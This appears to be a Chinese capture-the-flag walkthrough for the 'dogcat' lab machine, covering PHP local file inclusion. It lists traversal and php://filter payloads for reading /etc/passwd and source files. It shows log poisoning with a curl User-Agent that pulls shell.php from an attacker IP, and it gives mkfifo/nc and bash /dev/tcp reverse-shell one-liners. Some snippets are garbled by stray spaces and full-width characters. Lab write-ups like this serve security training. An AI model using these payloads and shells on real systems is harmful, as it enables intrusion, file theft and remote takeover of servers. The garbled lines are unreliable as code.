【靶机】dogcat

dogcat
I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container.

讲解视频https://www.bilibili.com/video/BV1WN4y1w784/

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>

一般的payload

http: //localhost/index.php? page = .. / .. / .. / .. / .. / .. / etc / passwd

passthru()
http://localhost/index.php?page = http://host.com/test.php
http://localhost/index.php?page = http://host.com/test.php? cmd = cat / etc /passwd

http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd


http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
 
Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

cat/../../../../../../../var/log/apache2/access.log&ext
<?php%20eval($_POST[1]);?>
10.10.175.83
curl -A “<？php file_put_contents（'shell.php'，file_get_contents('http://10.10.0.56:9999/shell.php')>” -s http://10.10.175.83

<?php system($_GET['cmd']); ?>
curl -A “<？php file_put_contents（'shell.php'，file_get_contents('http://10.10.0.56:9999/shell.php')>” -s 10.10.173.156

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.56 4242 >/tmp/f

<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
        <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
        $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>
    </div>
</body>

</html>

      <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
        $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';

//类似于Java的三元运算符   条件一?条件二:条件三
//如果条件“expr1”成立，则执行语句“expr2”，否则执行“expr3”。
//检查是否提供了“ext”参数，如果没有，它默认将“.php”添加到我们的文件名

            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>

payload = cat/../../../../../../../var/log/apache2/access.log&ext

bash -i >& /dev/tcp/10.10.100.225/9898 0>&1